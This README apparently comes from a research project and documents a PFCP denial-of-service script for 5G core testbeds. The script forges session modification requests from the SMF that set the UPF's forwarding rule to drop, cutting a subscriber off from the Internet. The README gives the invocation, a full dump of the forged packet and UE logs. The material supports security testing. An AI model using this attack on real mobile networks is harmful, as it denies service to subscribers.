# Introduction:

The python script of this directory executes a PFCP DoS attack via synthesized session modification requests. The script successfully formulates PFCP packets, recognizable by tshark/wireshark, using scapy. The script saves the generated PFCP session modification packets in a pcap file, and replays the capture file's content using tcpreplay in real-time.

The script has been tested in a dockerized 5G Core testbed. However, it can also be used in a Virtual Machine (VM)-based 5G Core testbed.

With respect to the dockerised 5G core testbed, the script is executed from the Session Management Function (SMF) container targeting the UPF.

This attack has been implemented in the context of the SANCUS H2020 project.  

# Attack Description

The PFCP DoS via Session Modification attack is instanciated from the SMF of the 5G core network.

![SMF.png](./images/SMF.png)

The target of this attack is the UPF, which handles processes and forwards user data to the Data Network (DN).

![UPF.png](./images/UPF.png)

The goal of this attack is to discard packet handling rules for a specific session, thus dissassociating a targeted User Equipment (UE) from the Data Network (DN). If the rules are changed successfully, the FAR rules containing the TEID and IP address of the base station are deleted on the UPF. As a result, the GTP tunnel for the subscriber's downlink data is cut off, depriving the subscriber of Internet access. The GTP-U tunnel can be subsequently restored by sending the re-quired data to the UPF. As with the other PFCP-based attacks, the script targets the PDU sessions between the clients and the DN in a such manner that does not dissasociate the UE from the 5G RAN or the Core network, but rather only cuts them off the DN. This attack is implemented on the N4 interface, and the impact can be observed in the N6 interface. 

![impact.png](./images/impact.png)

# Requirements

In general, this attack script only requires scapy and tcpreplay. The following steps summarize the installation of the aforementioned python libraries.

Step 1: Update and Refresh Repository Lists

`sudo apt update`

Step 2: Install supporting software

`sudo apt install software-properties-common`

Step 3: Add Deadsnakes PPA

`sudo add-apt-repository ppa:deadsnakes/ppa`

`sudo apt update`

Step 4: Install python

`sudo apt install python3.8`

Step 5: Check python3 version

`python3 --version`

Step 6: Install pip3

`sudo apt install python3-pip -y`

Step 7: Install scapy 

`pip3 install scapy`

Step 8: Install "tcpreplay"

`sudo apt install tcpreplay -y`

# Attack Execution and Parameters
The following parameters are utilised by the script:

**1. IP_src:** The IPv4 address of the PFCP control plain (SMF). This parameter is provided as a command-line argument.

**2. IP_dst:** The IPv4 address of the PFCP user plain (UPF). This parameter is provided as a command-line argument.

**3. Iface:** The interface from which the malicious packets will be sent. This parameter is provided as a command-line argument.

The required parameters can be passed into the script as arguments. The targeted SEID is currently assumed to be `0x1`. When a UE device establishes a PDU connection with th DN, the session it has with the internet is identified by the SEID; as more PDU sessions are established through the 5G core, the SEID each session is assigned incrementally increases. For our tests, as we are only using a single UE, there is no point in defining more arguments as input parameters. This can be updated in the future, as more funcitonalities are added to the script. Therefor, for now only the source and destination IP addresses are required, which correspond to the SMF and UPF IPv4 addresses respectivelly.

The file which implements this attack is the **pfcp-SM-DoS.py** script.

Please navigate to the directory containing the file and execute it with sudo privileges whilst providing the required arguments:

`sudo python3 pfcp-SM-DoS.py <IP_src> <IP_dst> <Interface>`

E.g.,:

`sudo python3 pfcp-SM-DoS.py 172.21.0.107 172.21.0.110 eth0`

The output of the command will be:

```
root@157f10e00a5a:/# python3 pfcp-SM-DoS.py 172.21.0.107 172.21.0.110 eth0
Starting Session Modification DoS with the following parameters:

Source IP = 172.21.0.107
Destination IP = 172.21.0.110
Selected Interface = eth0

Target SEID is assumed to be equal to 0x1.

###[ Ethernet ]### 
  dst       = 02:42:ac:15:00:6e
  src       = 02:42:ac:15:00:78
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = None
     tos       = 0x0
     len       = None
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = None
     src       = 172.21.0.107
     dst       = 172.21.0.110
     \options   \
###[ UDP ]### 
        sport     = 8805
        dport     = 8805
        len       = None
        chksum    = None
###[ PFCP (v1) Header ]### 
           version   = 1
           spare_b2  = 0x0
           spare_b3  = 0x0
           spare_b4  = 0x0
           MP        = 0
           S         = 1
           message_type= session_modification_request
           length    = 52
           seid      = 0x1
           seq       = 106
           spare_oct = 0
###[ PFCP Session Modification Request ]### 
              \IE_list   \
###[ IE Update FAR ]### 
                 ietype    = Update FAR
                 length    = 36
                 \IE_list   \
###[ IE FAR ID ]### 
                    ietype    = FAR ID
                    length    = 4
                    id        = 1
                    extra_data= ''
###[ IE Apply Action ]### 
                       ietype    = Apply Action
                       length    = 1
                       spare     = 0x0
                       DUPL      = 0
                       NOCP      = 0
                       BUFF      = 0
                       FORW      = 0
                       DROP      = 1
                       extra_data= ''
###[ IE Update Forwarding Parameters ]### 
                          ietype    = Update Forwarding Parameters
                          length    = 19
                          \IE_list   \
###[ IE Destination Interface ]### 
                             ietype    = Destination Interface
                             length    = 1
                             spare     = 0x0
                             interface = Access
                             extra_data= ''
###[ IE Outer Header Creation ]### 
                                ietype    = Outer Header Creation
                                length    = 10
                                STAG      = 0
                                CTAG      = 0
                                IPV6      = 0
                                IPV4      = 0
                                UDPIPV6   = 0
                                UDPIPV4   = 0
                                GTPUUDPIPV6= 0
                                GTPUUDPIPV4= 1
                                spare     = 0
                                TEID      = 0x1
                                ipv4      = 172.21.0.111
                                extra_data= ''

None
WARNING: PcapWriter: unknown LL type for bytes. Using type 1 (Ethernet)
```
Observe that a new `sess-mod.pcap` file has been created in the same directory where the script was executed. It contains the packet synthesized by scapy and replayed by tcpreplay. If you wish to re-run the script, make sure the sess-mod.pcap file does not exist beforehand, as tcpreplay will attempt to replay all containing traffic.

Through wireshark, we can observe that all packets are formatted appropriately.

![wireshark.png](./images/wireshark.png)

Interestingly, checking the logs of the UE does not reveal any issue with the PDU session after the attack has been implemeted.

```
root@506bde4bf7dd:/UERANSIM/build# ./nr-ue -c oai-ue.yaml 
UERANSIM v3.1.9
[2022-06-07 10:19:19.404] [nas] [info] UE switches to state [MM-DEREGISTERED/PLMN-SEARCH]
[2022-06-07 10:19:19.406] [rls] [debug] Coverage change detected. [1] cell entered, [0] cell exited
[2022-06-07 10:19:19.406] [nas] [info] Serving cell determined [UERANSIM-gnb-208-93-1]
[2022-06-07 10:19:19.406] [nas] [info] UE switches to state [MM-DEREGISTERED/NORMAL-SERVICE]
[2022-06-07 10:19:19.406] [nas] [debug] Sending Initial Registration
[2022-06-07 10:19:19.406] [nas] [info] UE switches to state [MM-REGISTER-INITIATED/NA]
[2022-06-07 10:19:19.406] [rrc] [debug] Sending RRC Setup Request
[2022-06-07 10:19:19.406] [rrc] [info] RRC connection established
[2022-06-07 10:19:19.406] [nas] [info] UE switches to state [CM-CONNECTED]
[2022-06-07 10:19:19.411] [nas] [debug] Sending Authentication Failure due to SQN out of range
[2022-06-07 10:19:19.418] [nas] [debug] Security Mode Command received
[2022-06-07 10:19:19.418] [nas] [debug] Selected integrity[2] ciphering[0]
[2022-06-07 10:19:19.426] [nas] [debug] Registration accept received
[2022-06-07 10:19:19.426] [nas] [info] UE switches to state [MM-REGISTERED/NORMAL-SERVICE]
[2022-06-07 10:19:19.426] [nas] [info] Initial Registration is successful
[2022-06-07 10:19:19.426] [nas] [info] Initial PDU sessions are establishing [1#]
[2022-06-07 10:19:19.426] [nas] [debug] Sending PDU Session Establishment Request
[2022-06-07 10:19:19.664] [nas] [debug] PDU Session Establishment Accept received
[2022-06-07 10:19:19.664] [nas] [info] PDU Session establishment is successful PSI[1]
[2022-06-07 10:19:19.687] [app] [info] Connection setup for PDU session[1] is successful, TUN interface[uesimtun0, 10.45.0.2] is up.
```
